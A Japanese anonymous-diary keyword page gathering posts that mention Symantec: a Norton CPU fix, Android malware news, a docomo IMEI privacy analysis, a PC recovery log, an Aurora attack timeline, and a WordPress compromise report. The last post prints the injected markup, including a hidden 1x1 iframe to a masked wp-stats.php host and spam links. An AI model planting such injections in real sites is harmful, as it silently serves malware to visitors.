「Symantec」を含む日記 RSS

はてなキーワード: Symantecとは

2020-06-21

Mac最近チアチでファン回り放しで困ってる奴ノートン使ってないか

Mac最近ファン回りっ放しで困っててノートン使ってたら一度チェック

ノートン暴走してる場合がある

まずアクティビティモニタを起動

アプリケーションフォルダユーティリティフォルダアクティビティモニタ

アクティビティモニタメニューからすべてのプロセスを表示

メニュー>表示>すべてのプロセス選択

%CPU列を降順で表示して一番CPUを消費している奴をあぶり出す

%CPU列に下矢印がついていたらCPU消費順に降順で並んでいる

もし%CPU列に下矢印がついて無ければ%CPU列をクリックしてCPU消費順に降順にする

ノートン暴走していないか確認する

com.symantec.mes.systemextensionが一番上にいたら怪しい

さらCPU時間列にとんでもない時間が書かれていたら間違いない

そしたらノートンIDを用意して

Mac で SymDaemon の CPU 使用率が高い問題を解決するをやる

効果

Macが嘘みたいに静かになる

2017-05-03

はてブページが「危険サイト」扱いになる件

Norton

危険Web サイト遮断しました

アクセスしようとしたページ:

http://b.hatena.ne.jp/entry/**********.html

これは既知の危険Web サイトです。このサイトを表示しないことをお勧めします。 詳細レポート でこのサイトセキュリティリスク説明します。

保護のために Web ページを遮断しました。 Symantec を参照してください。

[このサイトを終了する]

この Web ページを表示できます

と表示する。

はてブページにたどり着くには「このWebページを表示できます」というリンクをいちいちクリックしないとならない。

で、「詳細レポート」をみると、「ID情報の脅威:1」となっている。

「脅威レポート」では「フィッシング攻撃 みつかった脅威:1」である

なんとかしれください

2014-07-10

貞子さんが出てくる最中

テレビコンセントが抜けたらどうなるの?

緊急地震速報がはじまったらどうなるの?

NHKの集金屋が来たらどうなるの?

また、

貞子さんがNTSC

再生機器PAL

場合、どうなるの?

あと、貞子さんがデジタル化されてWinnyに乗っちゃったらSymantecはどうするの?

2012-05-20

http://anond.hatelabo.jp/20120519155423

じゃあ、個人情報不正に送信していたというandroidアプリについて。

android恐ろしいねGoogle Playでこれらが掲載されていたというから

まるでパソコンみたい。少なくともこれまでの「携帯電話」じゃない。

私はスマートフォンを持っていないし、こういうニュースがあれば欲しいとも思えない。

ドコモなんてandroid端末ばかり発表して…

Androidに見つかったパーミッションモデルの欠陥」ITpro世界セキュリティラボから 2011/12/15

http://itpro.nikkeibp.co.jp/article/COLUMN/20111213/376521/

  

警視庁家宅捜索を行ったようだけど、どうして会社名出てこないのだろう。

容疑の段階だからだろうか?

警視庁不正指令電磁的記録供用容疑で、東京都内のIT関連会社や同社関係者宅など数カ所を家宅捜索していたことが18日、分かった。

「都内のIT会社家宅捜索 警視庁ウイルス供用容疑」47NEWS 2012/05/18 11:11

http://www.47news.jp/CN/201205/CN2012051801001341.html

ほかのニュース記事も探してみたけれど、どこにも名前が出てこない。

危ないというアプリ名前は公表されているから、ユーザーは対策とれるだろうけれども。

ちなみに。

シマンテックは、これらのアプリAndroid.Dougalek として検出します。ノートン モバイルセキュリティは上にリストしたアプリをすべて検出するほか、類似の特徴を持ちながらまだ特定されていないアプリも検出します。

<中略>

報道によると、警視庁は今回の問題について調査を開始し、Android.Dougalek の作成者の特定に動いているようです。

日本Android ユーザーから個人情報を盗み出す "The Movie" マルウェアSymantec Connect Community 16 Apr. 2012

http://www.symantec.com/connect/de/blogs/android-movie

シマンテックが発表しているので、特定がなされたら「都内IT関連会社関係者」が報じられるのかも。

2011-10-19

docomoがIMEIを送出!のどこが問題なのか。素人が考えてみた。

今年冬以降に発売されるandroid端末のメディアプレイヤーHTTPヘッダのUser-Agentおよび拡張ヘッダにIMEI番号が含まれるということが分かり、騒動となった。

カレログapplogに続きNTTドコモが参戦? - http://togetter.com/li/202490

NTT docomo IMEI垂れ流し問題 http://togetter.com/li/202536

まず、

(1)IMEI送出のソース

音楽動画 | サービス機能 | NTTドコモ

http://www.nttdocomo.co.jp/service/developer/smart_phone/service_lineup/music_movie/index.html

魚拓http://megalodon.jp/2011-1019-1834-56/www.nttdocomo.co.jp/service/developer/smart_phone/service_lineup/music_movie/index.html

こう記述されている。

Android端末の一部機種では、音楽動画コンテンツ再生するためのメディアプレイヤードコモプリインストールします。

メディアプレイヤープリインストールされる機種は2011年度下期モデル以降の主なAndroid端末となります

ユーザエージェント

メディアプレイヤーHTTP通信を行う際のUser-Agentヘッダは以下となります

User-Agent:<SPDOCOMO/2.0SP>[AAA](MP;[BBB];Android;[CCC];[DDD]);imei:[xxxxxxxxxxxxxxx];networkoperator:[yyyzz]<CR><LF

SP>:半角スペース

CR><LF>:改行コード

[]以外は固定値

AAA:機種名

BBB:メディアプレイヤーバージョン

CCCOSバージョン

DDDビルド番号

xxxxxxxxxxxxxxx[15桁]:IMEI

yyy[3桁]:Mobile Country Code

zz[2桁]:Mobile Network Code

HTTP通信時の拡張ヘッダ付加情報

メディアプレイヤーHTTP通信を行う際は、以下の拡張ヘッダが付与されます

x-dcmstore-imei:<SP>xxxxxxxxxxxxxxx<CR><LF

SP>:半角スペース

CR><LF>:改行コード

xxxxxxxxxxxxxxx[15桁]:IMEI


(2)IMEI番号とは何か

ケータイ用語の基礎知識http://k-tai.impress.co.jp/cda/article/keyword/43518.html

によれば、

携帯電話データ通信カードが1台ずつ持っている識別番号です。原則として、各端末は1台1台、異なる番号になっています

IMEIは、1台ずつに違う番号が割り振られていて、USIMカードなどを差し替えても変わることはありません。

とある

端末に固有の番号であるという認識でよいだろう。パソコンで言うMACアドレスのようなものだ。

問題の切り分け

重複する部分もあるが、いくつかの問題が含まれているように思える。

twitterで見られた反応をいくつか整理してみた。

(a)共通・不変のIDであること

これが最も大きい問題。twitterでIMEIってつぶやいている人の大半はこれを問題視している。

IMEI番号をそのまま送信している。

すなわち、コンテンツプロバイダ(CP)Aにも、CP-Bにも同じ番号が送信されている。

まり空間的に広く使われている。

CP-AとCP-BでIMEI番号を突き合せて、収集した情報リンクさせることができてしまう。

IMEI番号は端末に紐付けられている。

したがって端末を買い替えない限り番号は変わらない。

まり長い時間、追跡され続けるということだ。

時間軸にも空間軸にも広く共通のIDが使われ続ける。

これが問題。

(a-1)過去の事例

10年以上前から同じことが繰り返されているため、空間時間的に広い共通IDを使うことの「何が問題か」知りたいなら過去の事例を参照するとよい。

高木浩光氏による行動トラッキング歴史と境界線についての備忘録 http://togetter.com/li/197732

インターネットにおけるIDトレーサビリティ(2003年)高木浩光http://www.nic.ad.jp/ja/materials/iw/2003/main/ipmeeting/panel-takagi.pdf

Tracking Cookie - Symantec http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2006-080217-3524-99

(b)機種変更中古端末での不安

まだIMEI送信機能付きandroid端末が発売されていないので、どういう実装か不明のため、これは想像上の懸念だ。

このIMEI番号送信機能は、おそらくDRMに利用することが目的の一つだろう。

特定の機種でのみ購入した音楽再生できる機能が組み込まれている可能性がある。

その場合機種変更をするとIMEI番号が変わるために購入したコンテンツを利用できなくなる可能性がある。

あるいは一人で二台以上の端末を所有する場合、どちらか一方の端末でしかコンテンツが利用できない可能性もある。

実際、iPhoneにおいて似た事例が発生していた。認証にUDID(端末固有ID)を用いていたアプリ機種変更ののちに使えなくなる事例があった。

また、それまで利用していた端末をオークション等で販売する可能性もある。

その場合、端末の新しい所有者が、古い所有者の購入したコンテンツを利用できてしまう可能性もある。

ただしこれらは想像上の懸念だ。

(c)セキュリティの問題

UserAgentまたは拡張ヘッダに記述されたIMEI番号をもとに認証を行うサイトの出現が懸念される。

参考:かんたんログインの事例 http://www.atmarkit.co.jp/fsecurity/rensai/keitaiweb02/keitaiweb01.html

そもそもIMEI番号の取得はかんたんだ。

友達不用意にその辺に放置した端末で「*#06#」と入力すれば取得できてしまう。

あるいは、動画の置いた罠サイトを用意して

ユーザアクセスさせればドコモがIMEIを送信してくれる。

送信される番号はどのサイトに対しても共通なので、他のサイトで使うことができる。

そしてなりすましも容易だ。

とか。

ここまでしてIMEI番号を送りたいドコモの狙い

恐らくDRMへの活用と広告への活用ではないか

ぼくよくわかんない><

終わりに。

プライバシに関する専門家でもないので、補足訂正おねがいしまーす。

あと、この問題を扱うに当たって、何を「個人情報」だとするのかとらえ方が人によって違うことに注意したほうが余計な労力を使わなくて済む、と思いまーす。

# 増田でははてな記法が一部使えますって。

# 非対応大杉イライラするわ♡

# 来年インターンシップ生で改善してよ。

2010-10-19

NEC VALUESTAR VW500をリカバリ領域のみで再セットアップするまでのまとめ

自分用および同様の症状で困っている方用ログ

当初の目的ブートエラーからの復帰

友人から起動しなくなったとヘルプが来たので急行

電源ボタンを押し、BIOS起動後、ブート中にこんなエラー

A disk read error occurred

Press Ctrl+Alt+Del to restart

帰省中1ヶ月ほど放置し、久しぶりに電源を押すとエラーが出るようになったらしい。

変なソフトインストールBIOSアップデート等はしていないとのこと。

エラー復旧に1週間も無駄にした挙句挫折

当初はF8キーを押して[詳細ブートオプション]を開ければ、すぐに直せると思っていたけど、

ブートから進まないのだからF8キーを押しても同じエラーが出るだけ。

一応、F2キーBIOS設定画面を開き、[Load Setup Defaults]を試すも症状変わらず。

 

また、VISTAにはXPの[回復コンソール]がなく、[システム回復オプション]という復旧手段が用意されている。

しかし、このマシンプリインストール版なので、ディスクからの起動できない。

この場合はF8キーを押して[詳細ブートオプション]を開いて、そこから起動できるようだ。

・・・・・・\(^o^)/オワタ

 

その後、試行錯誤を繰り返した結果、再セットアップするしかないという結論に至った。

KNOPPIXデータバックアップを取っておこう

バックアップするにもWindowsが起動しないので、こんな時はいつもLinuxOS Knoppixに頼っている。

公式サイトhttp://www.rcis.aist.go.jp/project/knoppix/)ではDVD版とCD版がiso形式で配布されており、DVDなりCDなりに焼けばOSディスク起動できる優れもの

さらにCD版をUSBインストールしたUSB版も作成できるので、非常用に1つ作っておくと便利。

以下、USBKnoppixの作り方。

こちらのサイトUSB-Knoppixではじめよう http://yumenohako.jp/cgi-bin/knoppix/wiki.cgi)を参考に簡単に解説。

【本題】リカバリディスク(再セットアップディスク)をどうやって作る?

このマシンは前述の通りプリインストール版なのでインストールディスク(再セットアップディスク)が付属していない。

では、どうやって再セットアップするかというと、

しかし、今回はF11キーを押してもエラーが表示されるのみ。それにわざわざリカバリディスク作成しているはずもなく手詰まり

リカバリディスクはこちら(http://nx-media.ssnet.co.jp/から購入できるけど価格は1万円。自作するしかない。

そもそも本来はリカバリディスク作成できるのだからHDD内のどこかにリカバリディスク用のデータが入っているはず。

そこで再びKNOPPIXを起動してみると、[NEC-RESTORE]という名前リカバリ領域が隠しパーティションとして用意されていた。

以下、リカバリ領域を使ったリカバリディスクの作り方。

こちらのサイトLaVieレストア顛末記 http://deme.jp/wing/vol019/demeshin/NEC.htm)が大変参考になった。感謝

以上の作業によりHDD故障していない限りはリカバリディスク作成して再セットアップ可能。

ただし、当初のエラーの原因がHDDにある可能性もあるので、HDDを交換してからリカバリディスクを使用した方がいいかもしれない。

今後はCrystalDiskInfoなどのソフトを使用してHDD監視をするつもり。

【失敗】再セットアップ時のエラー

再セットアップが進むと、シマンテック社の「Norton Ghost」というバックアップツールが起動し、1%2%3%...と作業が進行する。

最初にやった時は、50%ほど作業が完了したところでこんなエラーが出現。

Cannot open GHOSTERR.TXT - insert diskette (434)

File Name ? (546)

Output error file to the following location

A:\GHOSTERR.TXT

[OK] [Cancel]

おそらくGHOSTERR.TXTというファイルの出力先が見つからないのだろうとあたりを付けて、

フォーマット済みCD-RWを挿入後、A:をCDドライブのF:に書き換えてOKを押すと

Application Error 19235

Ghost has detected corruption in the image file.

Please perform an integrity check on the image.

if this program persists, please contact Symantec support center

or contact systematec support

どうやらイメージファイルが壊れているらしい。

このイメージファイルとは、前述リカバリディスク作成手順6以降の[拡張子GHSファイル]。GHSGHOSTの略か?

そこで、Disk4,5,6をNERO9体験版太陽誘電製のTHE日本製DVD-Rを使用し、

念のためディスク1枚あたり4GBを超えないようにし、4倍速で焼き直してみたところ、今度は正常に再セットアップが完了。

最初Windowsに標準装備されている[ディスクへの書き込み]+台湾製の安物DVD-Rを使用したのだが、

どこかで焼きミスしたことがエラーの原因だったらしい。

これを教訓に次からは絶対にライティングソフト国産ディスクを使うことにしよう。

(追記10/22)HDD健康状態は「注意」レベル

CrystalDiskInfoを使用してHDDの状態を調べたところ、案の定「注意」レベルだった。

注意項目生の値 
代替処理保留中のセクタB(11
回復不可能セクタ25(37)

※[生の値]の数値はデフォルトが16進数表記。括弧内は10進数に変換した数値。

やっぱり当初のエラーHDD故障とまではいかなくとも寿命が近いということだったのか。

使用時間は17000時間HDDの交換を検討した方が良いけど、一体型の交換は難しいような。

まずはWestern DigitalHDDからData Lifeguard Diagnosticsでゼロフィルをやってみる予定。

エラーチェックで完全に逝くかもしれないけど、バックアップもしてるし、リカバリディスクもあるし。

あと、VistaのバーションはSP1だと思っていたけど、まだ更新していなかった模様。

そこで更新プログラムインストールしてみると途中で止まってしまい、修復スタートアップする羽目に。

(追記10/24WD Data LifeGuard Diagnosticsのゼロフィルで「正常」に回復

Vista SP1の導入に失敗し、修復スタートアップを行ったものの、12時間経っても終わらず。

そこでいっそのことHDDデータを完全に消去して、再セットアップすることにした(7時間ほどかかる)。

方法としては先日のとおり、Western DigitalHDDの診断ツール「Data Lifeguard Diagnostics」を使用する。

このツールはFDD版とCDしかないので、いつものようにUSB版の作成を試みる。以下作り方と使用方法

再セットアップ後、CrystalDiskInfoを実行すると見事に「正常」レベルに回復。

前回注意項目だった「代替処理保留中のセクタ」と「回復不可能セクタ数」の生の値は0に変化。

なぜか使用時間が14000時間に減少していたものの、とりあえずはHDD故障心配はしなくていいかな。

ちなみにSP1の導入は成功。今後はCrystalDiskInfoを常駐させ、監視を続けることにする。

 

(追記11/8/18)そろそろ限界

あれから10か月後、悪夢ブルースクリーン降臨したので、またクリーンインストールを行った。

CrystalDiskInfoを使用してHDDの状態を調べたところ、「注意」レベルに逆戻り。

注意項目生の値 
代替処理保留中のセクタ2D9(729)
回復不可能セクタ70(112)

※[生の値]の数値はデフォルトが16進数表記。括弧内は10進数に変換した数値。

以前のエラー時よりさらに状況が悪化しており、HDD寿命がかなり迫っている模様。

いつ突然死を迎えてもおかしくないので、重要データバックアップのうえHDDの交換を予定。

 

ブログがないので、増田ログ残し。ツッコミや質問はid:frsattiまで。

2010-01-17

Google中国撤退問題

各種報道よりGoogle中国撤退問題のまとめ

2006年1月 Google中国に進出 当局の検閲を受け入れる

2009年12月 Aurora事件 シリコンバレー企業に大規模ハッキング

ハッキングの手口

メールURLリンクを送りつけ→従業員が間違って悪意のあるサイトを訪問→

IE6脆弱性JavaScriptバッファオーバーフロー)を突いた暗号化された

未知のマルウェアが気付かないうちに自動で仕込まれる→

マルウェアサーバーからほかのマルウェアDLしはじめる→

社内ネットワークに侵入→各種データを収集→

イリノイテキサス台湾サーバー情報を送る→痕跡を消去

McAfeeの説明

Adobe Reader脆弱性を突いたpdfを添付した電子メールを従業員に送りつける→

『Trojan.Hydraq』というバックドアトロイの木馬インストールされる→

社内ネットワークに侵入

iDefenseの説明

34社がターゲットになった

Google, Adobe, Yahoo, Symantec, Juniper Networks, ノースロップグルマン、ダウ・ケミカルなど

12/15 シリコンバレーハッキング攻撃開始 

    Googleが侵入に気付く 台湾サーバーを覗く(逆ハック)

1/2 Adobeが侵入に気付く

1/4 攻撃終了 攻撃者のサーバーが閉じられる

1月 Google社内で議論 セルゲイ・ブリン中国撤退論、ラリー・ペイジエリック・シュミットは続行論

1月 Googleが他社や米当局に相談

1月第2週 ヒラリーGoogle, MS, Twitter, シスコ幹部と会談

1/12 Googleブログ中国撤退検討を表明、また検閲廃止を表明

   Adobeが侵入されたことを発表

1/14 ペロシ下院議長がGoogle支持を表明

1/17 現在の情勢

予定

1/21 ヒラリーが『インターネットフリーダム』を発表予定

  • note:個人的なまとめなんで抜け・細かい間違いとかあるかも。公表情報氷山の一角なので、まだ知られてないことが大量にあるのでしょう。

2008-03-07

wordpressには穴があるんじゃないだろうか

wordpressを設置して1年。

放置しっぱなしのドメインがあって、そういえば明日で期限が切れるとおもって見に行った。

ウイルスバスターが反応した。

警告

ウイルスが見つかりました

ファイル名 wp-stats[1].htm

ウイルス JS_PSYME.XP

JS_PSYME.XP

概 要 対応方法 感染状況

参 照

ウイルスタイプ: JavaScript

別 名: Downloader (Symantec), TR/Dldr.HTML.Agent.IS (Avira),

感染報告の有無 : なし

言語: English

危険度: 低

感染報告: 低

ダメージ度: 低

感染力: 低

特 徴: Worm generic description


ざっと管理画面からどこか改変されてないかみてみたが見当たらなかった。

プラグインのせいだろうか?

いやそもそもこのSymantecの文字が気になる。

もしかして、ノートン先生ウイルス認定しているのだろうか?

気になる事があるとすれば、

購読者 - (Subscriber)が7名いること。

ユーザー登録してなんになるんだろう。

runPHP狙いだろうか。Subscriberには権限を与えていないので意味がないはずだとおもう。

コメント投稿狙いだろうか。

Akismet はインストールされてから 778 件のスパムを捕らえました。

Akismetがんばったね!!

ま、明日さくっと消しておこう。。。


追記。

わかった。記事の内容が書き換えられていた。

書き換えられていた記事は最後の書き込み。

ニコニコビデオのやつをはったやつだった。

ニコニコ動画のiframeの本来のタグを無効化して違うところを参照するifreameを書いてござった。

<iframe width="312" height="176" src="http://www.nicovideo.jp/thumb/XXXXXX" scrolling="no" style="border:solid 1px #CCC;" frameborder="0"><a href="http://www.nicovideo.jp/watch/XXXXXXX">【ニコニコ動画】XXXXXXXX</a></iframe>

<iframe width="312" height="176" src="http://www.nicovideo.jp/thumb/XXXXXX" scrolling="no" style="border:solid 1px #CCC;" frameborder="0"><a href="http://www.nicovideo.jp/watch/XXXXXXX">【ニコニコ動画】XXXXXXXX</a></iframe>

これが

&lt;iframe width="312" height="176"
<noscript>XXXX(なんかスペイン語っぽい言葉)
 <a href="XXXXX">XXXXXXXX</a>
XXXXXX</noscript>
 src="<a href="http://www.nicovideo.jp/thumb/XXXXX">http://www.nicovideo.jp/thumb/XXXXX</a>" scrolling="no"
<noscript>
XXXXXXXX(上と違う内容)
<a href="XXXXXXX">XXXXXXX</a>
XXXXXXXX
</noscript>
 style="border:solid 1px #CCC;" frameborder="0"&gt;&lt;a href="
<a href="http://www.nicovideo.jp/watch/XXXXXX">
http://www.nicovideo.jp/watch/XXXXXX</a>
"&gt;【ニコニコ動画】XXXXXX(1/2)&lt;/a&gt;&lt;/iframe&gt;

<p&gt;&lt;iframe width="312" height="176" src="

<a href="http://www.nicovideo.jp/thumb/XXXX">http://www.nicovideo.jp/thumb/XXXXXX</a>

"<!-- Traffic Statistics --> 
<iframe src=XXXXXXXX/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!-- End Traffic Statistics --> scrolling="no" style="border:solid 1px #CCC;" frameborder="0"&gt;&lt;a href="<a href="http://www.nicovideo.jp/watch/XXXX">http://www.nicovideo.jp/watch/XXXX</a>
"&gt;【ニコニコ動画】XXXXXXXX(2/2)&lt;/a&gt;&lt;/iframe&gt;

なにがしたいのかわからないが、

なんかもしかしたら3回ぐらい同じ系統で書き換えられてるのかもしれない。

やりかたはさっぱり想像できない。

でも、ここまで記事の内容が差し替えられるのだとしたら、管理者アカウントをのっとっちゃうのが一番てっとりばやいかな。

で、新しく記事が投稿されたのか監視するために購読者登録っと。

そんなところじゃないだろうか。。。

なんだろう。辞書アタックかな?

 
ログイン ユーザー登録
ようこそ ゲスト さん